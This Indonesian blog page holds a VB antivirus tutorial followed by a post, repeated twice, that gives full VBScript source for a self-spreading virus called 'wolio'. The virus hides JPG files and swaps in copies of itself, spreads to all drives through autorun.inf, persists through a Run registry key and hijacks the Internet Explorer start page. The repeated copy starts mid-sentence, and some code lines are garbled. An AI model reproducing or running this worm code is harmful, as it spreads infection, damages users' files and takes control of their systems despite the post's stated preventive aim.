Keamanan dalam bekerja dengan menggunakan komputer sebagai sarana mengaplikasikan berbagai pekerjaan, anti virus merupakan kebutuhan pokok yang harus dipunyai oleh setiap komputer. tapi apakah semua anti virus yang beredar di pasaran sanggup untuk mengatasi berbagai malcode yang berkeliaran? jawabannya pasti tidak. kenapa? karena semakin canggihnya teknologi dan semakin pintarnya seseorang maka semakin bobrok juga otak2 orang itu.,…..
Pada kenyataannya, sekarang banyak virus, worm dan berbagai saudaranya yang beredar yang dihasilkan oleh orang2 yang tak punya moral dengan tujuan tertentu. (ah…..jadi vixers ga ada untungnya, cuma ngerusakin kompi orang).
yooo…. dari pada basa basi mending kita bahas, susah ga bikin removal atau anti virus itu? jawabannya bisa ya bisa tidak, kenapa.? kalo mo buat anti virus yang diperlukan adalah bahasa program apa yang kita kuasai, klo ga menguasai gimana dok? jawabannya ya belajarlah (susah2 amat).
ok…. buat persiapan bikin anti virus :(…….Lets Go………)
1. Siapkan sampel2 virus
Kita harus nyiapin sampel2 virus, yang berguna agar program ,yang kita buat dapat mendeteksi keberadaan virus2 tersebut. semakin banyak sampel yang kita punyai semakin baik program tersebut dalam mendeteksi virus2 yang beredar maupun varian2 nya.
2. Teh Panas, Lucky Strike and Lagu Kesukaan ( BIar Ga Bosan)
(saya hanya memaparkan beberapa souce code yang dianggap penting,,,, dalam membuat anti virus)
MEMBACA SIGNATURE VIRUS YANG ADA
Private Sub cmdTambah_Click()
Dim nf As Integer
Dim cVDF As String
Dim cPattern As String
cVDF = App.Path + “\Scan.vdf”
nf = FreeFile
Open cVDF For Append As #nf
cPattern = AmbilPatternFile(txtPath.Text)
If cPattern = “” Then
MsgBox “Gagal mengambil pattern virus !”, vbCritical, vbOKOnly
Else
Print #nf, cPattern + txtNamaVirus.Text
Call lstHistory.AddItem(”Tambah VDF : ” + txtNamaVirus.Text, 0)
End If
Close #nf
End Sub
Kelemahan Teknik ini berfungsi jika signature virus ada, jika tidak maka kemungkinan virus-virus tidak akan dikenali….
teknik lain yang sering digunakan oleh antivirus lain seperti CRC atau ceksum… dan ini kemungkinan besar untuk mendeteksi keberadaan virus-virus yang ada
CEK PROSES BERJALAN
Public Sub CekProcesses()
Dim hSnapShot As Long
Dim ProcessEntry As PROCESSENTRY32
Dim NextEnumExists As Boolean
Dim Pos As Long
Dim pId As Long
Dim fileName As String
Dim baseName As String
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
If hSnapShot = 0 Then
MsgBox “Failed to create Module and Thread snapshot”
Exit Sub
End If
ProcessEntry.dwSize = Len(ProcessEntry)
NextEnumExists = 0 <> Process32First(hSnapShot, ProcessEntry)
While NextEnumExists
pId = ProcessEntry.th32ProcessID
Pos = InStr(ProcessEntry.szExeFile, Chr(0))
If Pos > 1 Then
fileName = Left(ProcessEntry.szExeFile, Pos - 1)
baseName = extractFilename(fileName)
Else
fileName = “”
baseName = “”
End If
Call lstHistory.AddItem(”Periksa (” + Hex$(pId) + “) ” + fileName, 0)
Call cekModules(pId)
NextEnumExists = 0 <> Process32Next(hSnapShot, ProcessEntry)
Wend
Call CloseHandle(hSnapShot)
End Sub
Public Sub CekModules(pId As Long)
Dim ModuleEntry As TMODULEENTRY32
Dim hProcess As Long
Dim Proceed As Long
Dim hSnapShot As Long
Dim lWritten As Long
Dim sBuffer As String * 512
Dim ImageNTHeader As IMAGE_NT_HEADERS
Dim e_lfanew As Integer
Dim Pattern As String
Dim i As Integer
If GetVersion = VER_PLATFORM_WIN32_NT Then
If Not SetPrivilege(”SeDebugPrivilege”, True) Then Exit Sub
End If
hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, pId)
If hProcess <> 0 Then
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pId)
If hSnapShot <> -1 Then
ModuleEntry.dwSize = Len(ModuleEntry)
Proceed = Module32First(hSnapShot, ModuleEntry)
Do While Proceed
sBuffer = Space(1024)
If ReadProcessMemory(hProcess, ByVal ModuleEntry.modBaseAddr, ByVal sBuffer, 512, lWritten) Then
If lWritten > 0 Then
e_lfanew = InStr(sBuffer, “PE” + Chr$(0) + Chr$(0)) - 1
If e_lfanew > 0 Then
If ReadProcessMemory(hProcess, ByVal (ModuleEntry.modBaseAddr + e_lfanew), ByVal ImageNTHeader, Len(ImageNTHeader), lWritten) Then
Pattern = buatPattern(ImageNTHeader)
i = 0
Do While i <= PatternCount
If Pattern = Left(PatternVirus(i), Len(Pattern)) Then Exit Do
i = i + 1
Loop
If i <= PatternCount Then
Call TerminateProcess(hProcess, 0)
Call lstHistory.AddItem(”Found :” + Mid$(PatternVirus(i), Len(Pattern) + 1), 0)
Call lstHistory.AddItem(”Action: Delete process”, 0)
End If
End If
End If
End If
End If
Proceed = Module32Next(hSnapShot, ModuleEntry)
Loop
End If
CloseHandle (hSnapShot)
End If
CloseHandle (hProcess)
If GetVersion() = VER_PLATFORM_WIN32_NT Then
Call SetPrivilege(”SeDebugPrivilege”, False)
End If
End Sub
setelah menghentikan prosesnya kita akan mencari virus2 tersebut
MENCARI DAN MENDAPATKAN VIRUS2 DIMEDIA PENYIMPANAN
Function GetFiles(Path As String)
Dim ObjFSO As Object
Dim sFiles As Object
Dim Pattern As String
Dim i As Integer
On Error GoTo Finally
Set ObjFSO = CreateObject(”Scripting.FileSystemObject”)
txtScan.Text = Path
For Each sFiles In ObjFSO.GetFolder(Path).Files
DoEvents
If InStr(”bat bin com cmd dll exe ini htt pif”, Right$(sFiles, 3)) > 0 Then
Pattern = AmbilPatternFile(sFiles)
If Pattern <> “” Then
i = 0
Do While i <= PatternCount
If Pattern = Left(PatternVirus(i), Len(Pattern)) Then Exit Do
i = i + 1
Loop
If i <= PatternCount Then
Call lstHistory.AddItem(”File :” + sFiles, 0)
Call lstHistory.AddItem(”Found :” + Mid$(PatternVirus(i), Len(Pattern) + 1), 0)
End If
End If
End If
Next
Finally:
End Function
Ini hanya point-point penting yang terdapat dalam suatu antivirus…..
semoga lo dapat ngembanginnya…….soalnya gw juga lagi nyoba(he…he…he…)…
ntar deh aq kasih teknik lain pada tutorial berikutnya.
sumber :http://win-cinta.blogspot.com/2008/02/teknik-membuat-anti-virus-dengan-vb.html
Read More..
Kamis, 16 Juni 2011
cara membuat virus dengan VB
Virus komputer merupakan program komputer yang dapat menggandakan atau
menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke
dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus
biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup.
Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat
pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual
Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario
virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat
didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan
merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut
terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat
restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet
Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan
pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
on error resume next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\win
dows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.
vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “bodoh”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat Read More..
menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke
dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus
biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup.
Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat
pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual
Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario
virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat
didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan
merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut
terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat
restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet
Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan
pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
on error resume next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\win
dows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.
vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()
Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “bodoh”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat Read More..
Langganan:
Postingan (Atom)